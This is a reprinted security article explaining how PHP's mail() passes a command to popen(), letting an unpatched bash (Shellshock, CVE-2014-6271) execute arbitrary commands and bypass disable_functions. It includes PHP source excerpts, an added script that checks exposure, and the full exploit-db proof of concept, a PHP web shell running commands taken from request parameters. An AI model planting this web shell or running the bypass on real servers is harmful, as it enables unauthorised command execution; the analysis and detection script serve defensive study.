Let's start with the process by which PHP's mail() function is invoked.
See the source, ext/mail.c, line 236:

```c
char *sendmail_path = INI_STR("sendmail_path");
char *sendmail_cmd = NULL;
```
This reads the sendmail_path variable from the INI. Let's see what php.ini says about it:

```ini
; For Unix only. You may supply arguments as well (default: "sendmail -t -i").
;sendmail_path =
```

As the comment notes, the default value of sendmail_path is "sendmail -t -i".
If extra_cmd (additional parameters supplied by the caller of mail()) is present, spprintf() is called to combine sendmail_path and extra_cmd into sendmail_cmd, the command line that is actually executed; if it is absent, sendmail_path is assigned to sendmail_cmd directly. As follows:

```c
if (!sendmail_path) {
#if (defined PHP_WIN32 || defined NETWARE)
	/* Handle old style win SMTP sending */
	if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
		if (tsm_errmsg) {
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
			efree(tsm_errmsg);
		} else {
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
		}
		MAIL_RET(0);
	}
	MAIL_RET(1);
#else
	MAIL_RET(0);
#endif
}

if (extra_cmd != NULL) {
	spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
} else {
	sendmail_cmd = sendmail_path;
}
```
Execution then continues:

```c
#ifdef PHP_WIN32
	sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);
#else
	/* Since popen() doesn't indicate if the internal fork() doesn't work
	 * (e.g. the shell can't be executed) we explicitly set it to 0 to be
	 * sure we don't catch any older errno value. */
	errno = 0;
	sendmail = popen(sendmail_cmd, "w");
#endif
```
sendmail_cmd is handed to popen() for execution.
If the system's default sh is bash, popen() ends up handing it to bash.
The earlier bash vulnerability (Shellshock, CVE-2014-6271) therefore lets us use the mail() function to execute arbitrary commands, bypassing disable_functions.
Affected versions: PHP versions
Fix: patch CVE-2014-6271
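As an added example (not part of the original article or of the PHP source), a POSIX shell script that checks, from the defender's side, the conditions this chain depends on: whether the installed bash is patched for CVE-2014-6271, whether /bin/sh resolves to bash, and what sendmail_path the PHP CLI reports. It assumes bash and php are on PATH and reports a labelled "unknown" otherwise.

```shell
# Added example, not code from the original article or from PHP: defender-side
# checks for the three conditions the article chains together. Assumes bash and
# the php CLI are on PATH; each check degrades to a labelled "unknown" otherwise.

# 1. Does the installed bash still run trailing code after a function definition
#    imported from the environment (CVE-2014-6271)? Standard check: the value
#    "() { :;}; echo vulnerable" must not cause "vulnerable" to be printed.
shellshock_status() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# 2. popen() runs the command through /bin/sh; the article's path into mail()
#    only exists when sh is bash. Report what /bin/sh resolves to.
sh_is_bash() {
    target=$(readlink -f /bin/sh 2>/dev/null || echo /bin/sh)
    case "$(basename "$target")" in
        bash) echo "yes" ;;
        *)    echo "no ($target)" ;;
    esac
}

# 3. popen() receives sendmail_path plus the caller's extra arguments; show the
#    configured path so a reviewer knows which binary actually runs.
php_sendmail_path() {
    command -v php >/dev/null 2>&1 || { echo "unknown (no php cli)"; return 0; }
    php -r 'echo ini_get("sendmail_path");' 2>/dev/null || echo "unknown"
}

# 4. Verdict for the mail()-based disable_functions bypass: it needs a
#    vulnerable bash that popen() reaches through /bin/sh.
mail_bypass_exposure() {
    if [ "$(shellshock_status)" = "vulnerable" ] && [ "$(sh_is_bash)" = "yes" ]; then
        echo "exposed"
    elif [ "$(shellshock_status)" = "vulnerable" ]; then
        echo "bash-vulnerable-sh-not-bash"
    else
        echo "not-exposed"
    fi
}

echo "bash CVE-2014-6271: $(shellshock_status)"
echo "/bin/sh is bash:    $(sh_is_bash)"
echo "php sendmail_path:  $(php_sendmail_path)"
echo "mail() bypass:      $(mail_bypass_exposure)"
```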
The PoC (http://www.exploit-db.com/exploits/35146/) is as follows:

```php
<?php
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
    $tmp = tempnam(".", "data");
    putenv("PHP_LOL=() { x; }; $cmd > $tmp 2>&1");
    // In Safe Mode, the user could only alter environment variables whose names
    // begin with the prefixes supplied by this directive.
    // By default, users would only be able to set environment variables that
    // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
    // PHP would let the user modify ANY environment variable!
    mail("[email protected]", "", "", "", "-bv"); // -bv so we don't actually send any mail
    $output = @file_get_contents($tmp);
    @unlink($tmp);
    if ($output != "") return $output;
    else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>
```
Article source: http://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html (author: phith0n)
When reprinting, please credit: Security Pulse » PHP Execute Command Bypass disable_functions